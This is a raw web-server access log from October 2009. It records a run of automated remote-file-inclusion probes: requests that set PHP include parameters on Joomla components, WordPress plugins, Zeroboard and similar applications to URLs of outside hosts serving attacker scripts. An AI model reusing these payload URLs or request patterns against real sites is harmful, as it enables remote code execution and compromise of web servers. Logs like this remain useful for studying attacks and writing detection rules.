209.97.212.185 - - [16/Oct/2009:01:33:38 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:01:33:39 -0500] "GET /logs/access_log.1237507200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:01:33:44 -0500] "GET /logs/access_log.1235088000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:33:51 -0500] "GET //voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:33:51 -0500] "GET /logs//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:33:51 -0500] "GET /logs/access_log.1246406400//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.218.228.226 - - [16/Oct/2009:01:33:59 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
201.218.228.226 - - [16/Oct/2009:01:33:59 -0500] "GET /logs/access_log.1237507200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
201.218.228.226 - - [16/Oct/2009:01:33:59 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:34:01 -0500] "GET /logs//bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:34:01 -0500] "GET //bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:34:01 -0500] "GET /logs/access_log.1251417600//bbs//skin/zetyx_grayscale/login.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
201.218.228.226 - - [16/Oct/2009:01:34:04 -0500] "GET /logs/access_log.1235347200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:37:34 -0500] "GET /logs/access_log.1252108800//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:01:38:15 -0500] "GET /logs/access_log.1252108800//voir.php?inc=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:04 -0500] "GET /logs/access_log.1251676800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:04 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:04 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:07 -0500] "GET /logs/access_log.1249862400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:11 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:11 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:11 -0500] "GET /logs/access_log.1249862400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:12 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:12 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:12 -0500] "GET /logs/access_log.1251676800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:01:40:17 -0500] "GET /logs/access_log.1249862400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:40:45 -0500] "GET //skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:40:45 -0500] "GET /logs/access_log.1251417600//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
93.90.176.25 - - [16/Oct/2009:01:40:45 -0500] "GET /logs//skin/happycast_category_crimson/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.207.30 - - [16/Oct/2009:01:41:31 -0500] "GET /logs/access_log.1214438400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.30 - - [16/Oct/2009:01:41:38 -0500] "GET /logs/access_log.1145836800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.97.212.185 - - [16/Oct/2009:01:41:38 -0500] "GET /logs/access_log.1235347200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:42:25 -0500] "GET /?DOCUMENT_ROOT=http://dubnahome.ru//one.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:42:25 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://dubnahome.ru//one.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:42:32 -0500] "GET /logs/?DOCUMENT_ROOT=http://dubnahome.ru//one.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:19 -0500] "GET /logs/access_log.1248480000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:19 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:19 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:24 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:24 -0500] "GET /logs/access_log.1248480000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:24 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:36 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:36 -0500] "GET /logs/access_log.1248480000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:36 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:37 -0500] "GET /logs/access_log.1252022400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:37 -0500] "GET /logs/access_log.1252022400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:01:44:56 -0500] "GET /logs/access_log.1252022400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:17 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:17 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:18 -0500] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:19 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:20 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:20 -0500] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:27 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:27 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:27 -0500] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:30 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:30 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:30 -0500] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:32 -0500] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:42 -0500] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:01:50:45 -0500] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:52:34 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:52:34 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:01:52:34 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET //write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET /logs/access_log.1253145600//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET /logs//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET //write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET /logs/access_log.1253145600//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:34 -0500] "GET /logs//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:53:36 -0500] "GET /logs/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:53:36 -0500] "GET /interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:53:36 -0500] "GET /logs/access_log.1230336000/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:38 -0500] "GET //write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:47 -0500] "GET /logs//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [16/Oct/2009:01:53:47 -0500] "GET /logs/access_log.1253145600//write.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:55:04 -0500] "GET /logs/access_log.1245542400/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.142.90.79 - - [16/Oct/2009:01:55:23 -0500] "GET /?sourcedir=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 200 3245 "-""libwww-perl/5.831"
174.142.90.79 - - [16/Oct/2009:01:55:23 -0500] "GET /logs/?sourcedir=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 200 209037 "-""libwww-perl/5.831"
216.40.205.130 - - [16/Oct/2009:01:57:43 -0500] "GET /logs/access_log.1248912000/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:57:43 -0500] "GET /logs/access_log.1244851200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:57:43 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:57:43 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.189.18.242 - - [16/Oct/2009:01:57:50 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.189.18.242 - - [16/Oct/2009:01:57:50 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.242 - - [16/Oct/2009:01:57:50 -0500] "GET /logs/access_log.1237507200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.189.18.242 - - [16/Oct/2009:01:58:05 -0500] "GET /logs/access_log.1235347200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:58:31 -0500] "GET /logs/access_log.1245715200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:01:58:31 -0500] "GET /logs/access_log.1245542400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:01:58:36 -0500] "GET /logs//outlogin.php/?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:01:58:36 -0500] "GET //outlogin.php/?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:01:58:36 -0500] "GET /logs/access_log.1246147200//outlogin.php/?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:01:58:42 -0500] "GET /logs/access_log.1251244800//outlogin.php/?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.185 - - [16/Oct/2009:01:59:01 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.162 - - [16/Oct/2009:02:00:48 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:00:48 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:00:48 -0500] "GET /logs/access_log.1236729600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:02:00:53 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:02:01:02 -0500] "GET /logs/access_log.1248652800//skins/advanced/advanced1.php?pluginpath[0]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:02:01:02 -0500] "GET /logs/access_log.1248134400//skins/advanced/advanced1.php?pluginpath[0]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:02:01:02 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.40.205.130 - - [16/Oct/2009:02:01:02 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://cw.ubru.ac.th/claroline172/courses/pid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.199.140.158 - - [16/Oct/2009:02:04:27 -0500] "GET /logs/access_log.1246147200//outlogin.php?_zb_path=http://oktober2.fileave.com/read.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.199.140.158 - - [16/Oct/2009:02:04:28 -0500] "GET //outlogin.php?_zb_path=http://oktober2.fileave.com/read.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
122.199.140.158 - - [16/Oct/2009:02:04:28 -0500] "GET /logs//outlogin.php?_zb_path=http://oktober2.fileave.com/read.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.199.140.158 - - [16/Oct/2009:02:04:49 -0500] "GET /logs/access_log.1242864000//outlogin.php?_zb_path=http://oktober2.fileave.com/read.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:21 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:21 -0500] "GET /logs/access_log.1240876800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:24 -0500] "GET /logs/access_log.1251244800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:24 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:27 -0500] "GET /logs/access_log.1251244800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:27 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:27 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:29 -0500] "GET /logs/access_log.1240876800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:29 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:29 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
203.185.129.36 - - [16/Oct/2009:02:05:45 -0500] "GET /logs/access_log.1241222400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:06:04 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:06:04 -0500] "GET /logs/access_log.1248825600//skins/advanced/advanced1.php?pluginpath[0]=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:06:04 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.206.120.162 - - [16/Oct/2009:02:06:07 -0500] "GET /logs/access_log.1240617600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:02:06:21 -0500] "GET /logs/access_log.1249430400//skins/advanced/advanced1.php?pluginpath[0]=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
